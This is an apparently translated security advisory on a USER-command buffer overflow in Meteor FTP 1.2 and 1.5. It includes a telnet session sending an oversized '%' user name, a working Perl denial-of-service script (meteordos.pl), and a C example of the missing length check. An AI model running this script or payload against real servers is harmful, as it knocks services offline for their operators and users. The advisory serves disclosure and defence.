Meteor FTP Server USER Command Memory Corruption Vulnerability

Published: 2003-08-08
Updated: 2005-05-25

Affected systems:
MeteorSoft Meteor FTP 1.2
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
MeteorSoft Meteor FTP 1.5
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
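Description:
BUGTRAQ ID: 8376

Meteor FTP is an FTP server for Windows.

The USER command in Meteor FTP lacks sufficient buffer bounds checking. A remote attacker can exploit this vulnerability to cause a denial of service against the server, and carefully crafted string data may allow arbitrary commands to be executed on the system with the privileges of the FTP process.

By connecting to the Meteor FTP server and sending a USER command with an overly long string as its argument, the FTP service can be crashed. A carefully constructed user name may allow arbitrary commands to be executed on the system with the privileges of the FTP process.

If the PASS and PORT commands are issued with appropriate arguments, the memory corruption may also lead to a buffer overflow.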

<*Source: Zee (zerash@evicted.org)
        Auston J (Anix44@gmail.com)

  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=106045414403076&w=2
*>
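
The length check that the description says the USER handler lacks, as an added example in C (not Meteor FTP's code and not part of the original advisory): a control-channel line parser that validates the argument length before copying it. The function names and the `FTP_ARG_MAX` and `FTP_LINE_MAX` limits are assumptions chosen for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define FTP_VERB_MAX 4   /* RFC 959 command verbs are 3 or 4 letters */
#define FTP_ARG_MAX  64  /* assumed policy limit for one argument */
#define FTP_LINE_MAX 512 /* assumed limit for a whole control-channel line */

enum { FTP_OK = 0, FTP_BAD_VERB = -1, FTP_ARG_TOO_LONG = -2 };

/* Split one control-channel line ("USER name\r\n") into verb and argument.
 * Each copy is bounded by its destination; an oversized argument is
 * rejected, not truncated, so the caller can reply 501 and keep serving. */
int ftp_parse_line(const char *line, size_t len,
                   char verb[FTP_VERB_MAX + 1], char arg[FTP_ARG_MAX + 1])
{
    size_t i = 0, v = 0;

    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                                  /* strip CR/LF */
    while (i < len && isalpha((unsigned char)line[i])) {
        if (v == FTP_VERB_MAX)
            return FTP_BAD_VERB;                /* verb would overflow */
        verb[v++] = (char)toupper((unsigned char)line[i++]);
    }
    verb[v] = '\0';
    if (v < 3 || (i < len && line[i] != ' '))
        return FTP_BAD_VERB;
    while (i < len && line[i] == ' ')
        i++;                                    /* skip separator */
    if (len - i > FTP_ARG_MAX)
        return FTP_ARG_TOO_LONG;                /* length checked before copy */
    memcpy(arg, line + i, len - i);
    arg[len - i] = '\0';
    return FTP_OK;
}

/* Constructed input: "USER " followed by n '%' bytes and CRLF. */
int ftp_try_user(size_t n)
{
    char line[FTP_LINE_MAX], verb[FTP_VERB_MAX + 1], arg[FTP_ARG_MAX + 1];

    if (n > sizeof line - 7)
        n = sizeof line - 7;                    /* keep the test line in bounds */
    memcpy(line, "USER ", 5);
    memset(line + 5, '%', n);
    memcpy(line + 5 + n, "\r\n", 2);
    return ftp_parse_line(line, 7 + n, verb, arg);
}
```

A server using a parser like this answers an over-long USER argument with an error reply and keeps serving other sessions.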

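Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Zee (zerash@evicted.org) provided the following test method: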

root@openwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
220 Service ready for new user
USER
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
530 Not logged on
QUIT
Connection closed by foreign host.

#!/usr/bin/perl
#
# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5
#
# A vulnerability has been identified in Meteor FTP Version 1.5, which
# allows malicious users to remotely crash the ftpd. By connecting to the
# ftpd and issuing USER followed by large amounts of data, the server
# crashes. For more info, go to :
# http://www.evicted.org/projects/writings/mftpadvisory.txt
#
# Usage : ./meteordos.pl <host/ip>
#
# Vulnerability & code by zerash
# Contact : zerash@evicted.org

use Net::FTP;
$host = $ARGV[0];

if("$ARGV[0]" eq "") {
    print("DoS against Meteor FTP Version 1.5 by zerash\@evicted.org\n");
    die("Usage : ./meteorftpdos <host\/ip>\n");
} else {    
    
    print("Connecting to $host...\n");
    my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n";
    print("Connected!\n");
    print("Attempting to exploit the ftpd...");
    $ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');  $ftp->quit;
    print("Success!\n");
}

Recommendation:
Vendor patch:

MeteorSoft
----------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://66.235.19.241/

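This security advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.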